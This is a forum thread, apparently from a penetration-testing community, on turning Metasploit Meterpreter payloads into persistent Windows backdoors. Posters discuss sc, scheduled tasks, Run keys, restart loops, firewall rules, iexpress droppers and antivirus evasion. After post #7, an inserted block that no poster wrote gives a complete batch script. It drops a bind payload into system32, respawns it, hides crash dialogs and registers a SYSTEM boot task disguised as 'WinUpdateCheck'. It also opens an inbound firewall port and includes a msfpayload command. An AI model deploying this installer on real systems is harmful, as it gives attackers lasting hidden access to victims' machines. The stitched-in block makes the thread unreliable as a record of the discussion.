Page 1 of 3 123 LastLast
Results 1 to 10 of 29

Thread: Metasploit payloads as backdoors?

  1. #1
    Member cr1spyj0nes's Avatar
    Join Date
    Sep 2008
    Posts
    164

    Default Metasploit payloads as backdoors?

    Hi there, I hope people with programming knowledge, or even just Ruby knowledge, read this.
    I've got this idea for Metasploit payloads: why not implement them to have backdoor capabilities? Like, once exploited, the payload you just used beds itself into the
    system32 dir,
    and the registry,
    you know what I mean. I love Meterpreter myself and I'm trying to accomplish this. It's not easy for me because I have next to no knowledge of programming, but I'm learning very fast. Off the top of my head, if I could get rid of that error message
    "blah blah has stopped working"
    after you disconnect, you could loop it so when you close the connection it re-opens a listener again. I don't know, just trying to mess around a bit; I'm sure someone has done it.
    Please reply if you have any ideas.
    I would rather be hated for what I am,
    Than loved for what I am not.

  2. #2
    Junior Member
    Join Date
    Aug 2007
    Posts
    55

    Default

    You don't need programming skillz to do this.
    Once you have a shell you can download/install any program as a service backdoor, including metasploit payloads.
    (You probably know that you can generate metasploit "exe" payloads, right?)

    Hint: the "sc" command in Windows. I leave the rest of the fun up to you.

  3. #3
    Member cr1spyj0nes's Avatar
    Join Date
    Sep 2008
    Posts
    164

    Default

    Yes, I know how to do that, I'm not that much of a noob. Will the sc command eliminate the error message?

  4. #4
    Super Moderator lupin's Avatar
    Join Date
    Jan 2010
    Posts
    2,943

    Default Metasploit backdoor?

    Am I right in thinking you just want to create a persistent backdoor on an exploited Windows host?

    If so, then barbsie is correct, the easiest way to do this will be to upload a backdoor executable, run it, and optionally use some sort of persistence mechanism to keep it running. If the backdoor executable itself keeps running and re-listens after disconnect (as would a nc listener using the -L "listen harder" switch) you only need to use a persistence mechanism if you want the backdoor to restart after a system reboot. If the backdoor executable doesn't re-listen after disconnect, you could write a batch file to keep restarting it.

    Regarding restarting the backdoor after a system reboot...

    Windows has a number of ways to autostart programs at boot time - the SysInternals autoruns tool will show you where the great majority of these methods are. Use of Windows Services (which can be controlled by the "sc" command line tool mentioned by barbsie) is one of the easiest ways to achieve this.

    However, there is a caveat with the use of Windows "Services" - it will kill programs after 30 seconds unless the program is written to respond to the Windows Service Control Manager's API request to determine if the service is running correctly. You can get around this by using a tool to "servify" the command (using something such as the "ServifyThis" tool), or you could use a command prompt to spawn your executable in a new process (cmd.exe /k "command"). Alternatively, another method to start the process and keep it running is to use the task scheduler (at or schtasks from the command line).

    Be careful using persistent backdoors on a pen test - you will need to clean up after yourself when the test is done.

    If you really want to do this inside Metasploit, you're going to need to learn to write shellcode, and I don't think doing what you suggest would be particularly easy. Even if you do manage it, you will also lose access to your backdoor once the exploited process restarts (unless you modify the program binary - which is a whole other kettle of fish).
    Capitalisation is important. It's the difference between "Helping your brother Jack off a horse" and "Helping your brother jack off a horse".

    The Forum Rules, Forum FAQ and the BackTrack Wiki... learn them, love them, live them.

  5. #5
    Member cr1spyj0nes's Avatar
    Join Date
    Sep 2008
    Posts
    164

    Default

    Yeah, I've got Meterpreter bind shellcode, put it in a .c file and compiled it. Now, is there any way to loop the process in C so you don't get the "met.exe has stopped working" message, or will I have to change the shellcode? I've got a backdoor that I made and it works very well, but I like Meterpreter. How can I work around this?

  6. #6
    Super Moderator lupin's Avatar
    Join Date
    Jan 2010
    Posts
    2,943

    Default

    Quote Originally Posted by cr1spyj0nes View Post
    Yeah, I've got Meterpreter bind shellcode, put it in a .c file and compiled it. Now, is there any way to loop the process in C so you don't get the "met.exe has stopped working" message, or will I have to change the shellcode? I've got a backdoor that I made and it works very well, but I like Meterpreter. How can I work around this?
    I just tried adding a while loop around the function calling the shellcode in a C program (the Win32 Bind Shell from the Metasploit Shellcode page) and couldn't get it to work. I'd suggest running the program from a batch file which keeps restarting it (as mentioned in my previous post).

  7. #7
    Member imported_Deathray's Avatar
    Join Date
    Oct 2007
    Posts
    381

    Default

    This is just a guess, but I think the reason metasploit has no persistent backdoor capabilities is maybe because of antivirus software.
    Try creating a meterpreter executable and upload it to www.virustotal.com. Last time I tried, I believe none of the products detected it.
    But that probably wouldn't stay the same if it had persistent capabilities.
    I don't know, what do the professionals say?
    But to the OP, one thing I like to do from Windows is go to Start -> Run -> iexpress.exe.
    That program allows you to create a self-extracting exe file which can silently execute a file once unzipped. So I like to compress a batch file together with the meterpreter.exe, and the batch file basically copies the meterpreter.exe to, for example, system32, then adds a key value to "Run" which automatically starts meterpreter upon boot, and finally executes netsh firewall XXXX to allow the program through the Windows firewall. You configure the compressed .exe with iexpress.exe to execute the batch once decompressed.
    The only disadvantage is that you have to remember the port it is set to listen on, because doing an nmap scan on the port meterpreter is listening on will cause it to crash.
    So after a successful penetration, upload the compressed file and execute it - then you have permanent access.
    - Poul Wittig
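The procedure described in the two posts above (lupin: upload the executable, wrap it in a restart loop, register it to run at boot with schtasks or sc, clean up when the test is over; Deathray: copy it to system32, add an autostart entry, open the firewall), collected into one install/uninstall batch script. This is an added worked example, not code from the thread, from Metasploit or from either poster. It assumes a bind payload named met.exe sitting next to the script (for instance one generated with msfpayload windows/meterpreter/bind_tcp LPORT=4444 X > met.exe), a Windows Vista/7 target, and an elevated prompt; the task name, rule name and port are placeholders chosen for the example. It uses a scheduled task rather than sc because a task has no Service Control Manager handshake to time out, and it turns off the Windows Error Reporting dialog, since on Vista/7 a crashed process stays alive until that dialog is dismissed, which would hang the restart loop on "start /wait".

```batch
@echo off
rem Added example, not from the thread: install/uninstall a dropped bind payload.
rem Assumptions (placeholders, not from the posts): met.exe is next to this script,
rem listens on TCP 4444, the target is Vista/7 and this runs from an elevated prompt.
setlocal
set "SRC=%~dp0"
set "TARGET=%SystemRoot%\system32"
set "EXE=met.exe"
set "PORT=4444"
set "NAME=WinUpdateCheck"

if /i "%~1"=="/uninstall" goto :uninstall

rem 1. Drop the payload into system32.
copy /y "%SRC%%EXE%" "%TARGET%\%EXE%" >nul || goto :fail

rem 2. Write a restart wrapper. The payload exits (or crashes) when the session is
rem    closed, so the loop starts it again after a short delay. The loop quits on
rem    its own once the wrapper file has been deleted by the uninstall step.
> "%TARGET%\keepalive.bat" (
    echo @echo off
    echo :loop
    echo if not exist "%%~f0" goto :eof
    echo start /wait "" "%TARGET%\%EXE%"
    echo ping -n 6 127.0.0.1 ^>nul
    echo goto loop
)

rem 3. Stop the "has stopped working" dialog from holding the crashed process open,
rem    which would block "start /wait" and stall the loop (Vista/7 WER setting).
reg add "HKLM\SOFTWARE\Microsoft\Windows\Windows Error Reporting" /v DontShowUI /t REG_DWORD /d 1 /f >nul

rem 4. Run the wrapper at boot as SYSTEM. A scheduled task avoids the Service
rem    Control Manager's 30-second start timeout that kills a plain exe run via sc.
schtasks /create /tn "%NAME%" /tr "%TARGET%\keepalive.bat" /sc onstart /ru SYSTEM /f >nul || goto :fail
rem    Logon-time alternative (runs as the logged-on user, shows a console window):
rem    reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "%NAME%" /t REG_SZ /d "%TARGET%\keepalive.bat" /f

rem 5. Let the bind listener accept inbound connections.
rem    (XP equivalent: netsh firewall add allowedprogram "%TARGET%\%EXE%" "%NAME%" ENABLE)
netsh advfirewall firewall add rule name="%NAME%" dir=in action=allow protocol=TCP localport=%PORT% program="%TARGET%\%EXE%" enable=yes >nul || goto :fail

rem 6. Start the task now instead of waiting for a reboot.
schtasks /run /tn "%NAME%" >nul
echo Installed. Listener on TCP %PORT%. Run "%~nx0 /uninstall" to remove it.
goto :end

:uninstall
rem Reverse every change above. Delete the wrapper first so the loop exits when
rem the payload is killed instead of restarting it.
schtasks /end /tn "%NAME%" >nul 2>&1
schtasks /delete /tn "%NAME%" /f >nul 2>&1
reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "%NAME%" /f >nul 2>&1
del /q "%TARGET%\keepalive.bat" >nul 2>&1
taskkill /f /im "%EXE%" >nul 2>&1
del /q "%TARGET%\%EXE%" >nul 2>&1
netsh advfirewall firewall delete rule name="%NAME%" >nul 2>&1
rem A real cleanup would restore the previous DontShowUI value rather than delete it.
reg delete "HKLM\SOFTWARE\Microsoft\Windows\Windows Error Reporting" /v DontShowUI /f >nul 2>&1
echo Removed.
goto :end

:fail
echo Install step failed. Run "%~nx0 /uninstall" to roll back.
:end
endlocal
```

Usage: upload install.bat and met.exe to the same directory on the host, run install.bat from an elevated shell, then connect with the matching bind handler on port 4444; each time the session is closed the wrapper respawns the listener. At the end of the engagement run install.bat /uninstall, which removes the task, the firewall rule, the registry values and both files, which is the clean-up lupin warns about.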

  8. #8
    Member cr1spyj0nes's Avatar
    Join Date
    Sep 2008
    Posts
    164

    Default

    But once you connect to it and disconnect, it prints an error message, "blah blah has stopped working"?

  9. #9
    Member imported_Deathray's Avatar
    Join Date
    Oct 2007
    Posts
    381

    Default

    Quote Originally Posted by cr1spyj0nes View Post
    But once you connect to it and disconnect, it prints an error message, "blah blah has stopped working"?
    Yes, unfortunately.
    I just found this, not sure if it will work, http://www.phreedom.org/software/metsvc/
    - Poul Wittig

  10. #10
    Member cr1spyj0nes's Avatar
    Join Date
    Sep 2008
    Posts
    164

    Default

    Yeah, I've tried that program. I'll try it on XP, but I don't think it's working right, though, or I can't work it, lol. If anyone has got this program working, please let me know.
